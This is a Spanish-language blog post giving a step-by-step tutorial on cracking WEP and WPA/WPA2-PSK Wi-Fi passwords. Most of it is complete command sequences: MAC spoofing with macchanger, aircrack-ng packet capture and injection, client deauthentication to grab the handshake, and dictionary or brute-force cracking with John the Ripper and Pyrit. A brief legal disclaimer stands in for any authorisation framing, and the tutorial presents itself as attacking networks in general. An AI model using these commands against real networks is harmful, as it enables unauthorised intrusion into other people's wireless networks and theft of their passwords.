//

Páginas

viernes, 15 de febrero de 2013

Wireless Hacking ( WEP, WPA/WPA2/PSK )

Wauuu lo que puede hacer un simple Script , volver loca a una mujer! .Una vez más demostrado que un informático también tiene su corazoncillo y que es un buen conquistador!!! :p.

Bueno volviendo al mundo malévolo y dejando la cursileria de lado , les presentaré un resumen de como atacar una Wireless con seguridad WEP y WPA/WPA2/PSK.

A continuación se ponen en conocimiento de los artículos del Código Penal del Reino de España que existe la posibilidad de que sean vulnerados si se diese un uso uso fraudulento de las comunicaciones inalámbricas. El autor no se hace responsable del uso de los conocimientos adquiridos o aquí descritos. "


Conociendo las normas legales continuaremos...

Para esto a manera de concepto existen diversos tipos de ataques sobre una Wi-Fi :

*Eavesdropping
*Defraudación de comunicaciones
*Hijacking
*Man in the Middle.
*Denial of Service & Distributed  D.O.S
*Spam/ Span over Voice over IP (SPIT)
*Ejecución remota de código arbitrario.
 
Empezando con algunos comandos en Linux :
-Viendo dispositivo inalámbrico y activandolo.
      ifconfig
      ifconfig wlan0 up
-Listando redes inalámbricas disponibles.
      iwlist wlan0 scan
-Conectandose a una red Wirless
      iwconfig wlan0 essid WifiDestroyer
-Opteniendo direccion IP.
      dhclient3 wlan0

Instalación en Linux de herramientas Wireless:
Normalmente viene  instalado pero si no hay que instalarlo manualmente.
Paquete “wireless-tool”.
  sudo apt-get install wireless-tools
Comprobar chipset
  lspci | grep Network
  lsusb | grep Wireless
•  Instalación de Suite Aircrack-ng
  sudo apt-get install aircrack-ng  
Airmon-ng: cambio de modo de NIC.
EJEMPLOS BÁSICOS:
•To start wlan0 in monitor mode:
  airmon-ng start wlan0
•To start wlan0 in monitor mode on channel 8:
  airmon-ng start wlan0 8
•To stop wlan0:
  airmon-ng stop wlan0
•To check the status:
  airmon-ng

Cambio de la MAC pasos:
#airmon-ng                          //viendo la interfaz que usamos
#airmon-ng stop  wlan0        //detenemos el modo monitor
#ifconfig  wlan0   down         //tiramos nuestra interface
#macchanger --mac 02:11:22:33:4B:5A wlan0     //cambiando la mac a 02:11:22:33:4B:5A
#airmon-ng start wlan0         //iniciamos el modo monitor nuevamente.

Nota:existen un sin numero de herramientas que practicamente automatizan el cambio de la 
MAC :
MAC Address Changer: (Windows)
Technitium MAC Address Changer: (Windows) 
   http://www.technitium.com/tmac/index.html


A)Buscando Redes empezando ATAQUE WEP:
#airodump-ng wlan0            //escaneando redes, para detener : Ctrl + C 
#airodump-ng -c 1 -w underc0de --bssid 4A:2C:56:33:76:5E wlan0  //canal : 3, capturamos 
 datas [no cerrar terminal]

Asociándonos a la Red (abrimos otro terminal)
#aireplay-ng -1 0 -a  4A:2C:56:33:76:5E -h 02:11:22:33:4B:5A -e WifiDestroyer wlan0  
Si nos aparece algun tipo de error puede ser por lo siguiente:
-La red a la que quieres atacar está muy lejos.
-Tu tarjeta de red no puede hacer inyección de paquetes.
-el router tiene seguridad para evitar este tipo de ataques.

Inyectando tráfico (en el terminal anterior)
#aireplay-ng -3 -b  4A:2C:56:33:76:5E -h 02:11:22:33:4B:5A wlan0  

Desencriptando el password (abrimos un tercer terminal )
#aircrack-ng underc0de-01.cap  
Con esto al termino del desencriptado nos mostrara el password.

B) ATAQUE WPA/WPA2/PSK:
Colocamos  nuestra interfaz en modo monitor de la misma forma que en el caso del Ataque 
WEP.
Capturando el HANDSHAKE
#airodump-ng mon0  //escaneando redes, para detener : Ctrl + C 
#airodump-ng mon0 --channel 1 --bssid 4A:2C:56:33:76:5E -w /tmp/wpa2  //nos aparece una 
imagen de la red de clientes conectados
Abrimos otro terminal y en el colocamos lo siguiente:
#aireplay-ng -0 1 -a 4A:2C:56:33:76:5E -c 70:F1:A2:95:T4:5D mon0    // 70:F1:A2:95:T4:5D : 
MAC del cliente
Ejecutado el comando, en el terminal anterior aparecerá en la parte superior derecho el 
Handshake.
Por ultimo desencriptaremos el password pudiendo hacerse de dos formas con :
*Fuerza Bruta con el John the Ripper.
*Por medio de Diccionario.
Obteniendo el Password
Utilizando el diccionario 
#aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b 4A:2C:56:33:76:5E /tmp/wpa2*.cap

Utilizando el john the ripper
# /pentest/passwords/jtr/john --stdout --incremental:all | aircrack-ng -b 4A:2C:56:33:76:5E -w - 
/tmp/wpa2*.cap
Ahora sólo nos queda esperar en vista que el tiempo es proporcional a la dificultad del 
password.

Existe una herramienta que también es muy recomendable por su automatización y por el 
tiempo que nos ahorrará ,siendo muy usada en las auditorias.
WIFITE es una herramienta que esta desarrollada en Python y que nos permitirá realizar 
ataque WEP y WAP al mismo tiempo, para esto lo descargamos :
#wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py
#chmod +x wifite.py
ejecutamos la aplicación
#./wifite.py
Lo que viene a continuación es sólo seguir la instrucción del programa que prácticamente 
trabajará al punto que nos brindara directamente el password de la red atacada.

David Hulton, permite alquilar en su web alquilar por pocos dólares, clusters de tarjetas 
FPGAS para crackear WPA.   https://www.cloudcracker.com/


Si se dispone de tarjetas gráficas compatibles, se pueden utilizar herramientas que son 
capaces de procesar el ataque en los núcleos de las propias GPUs. Por ejemplo, con 
Elcomsoft Wireless Security Auditor (Windows).   http://www.elcomsoft.es


En Linux, se puede usar Pyrit. Este programa permite crear Bases de datos masivas de 
hashes precalculados de passwords. Para ello hace uso de los multiples cores de una 
maquina y de algunas tarjetas graficas como ATI-Stream, Nvidia CUDA and OpenCL. 
Es el ataque más potente que se puede hacer actualmente para ataques de fuerza 
bruta.


Comandos: pyrit -r captura_WPA_Wifilabs.pcap-01.cap -i dict.txt -b 1c:7e:e5:fd:08:f8 
attack_passthrough
  -r à fichero de captura de Handshake
  -i à Dicccionario
  - b à BSSID de la red
  attack_passthrough




No hay comentarios:

Te ha sido de gran ayuda este Blog?

//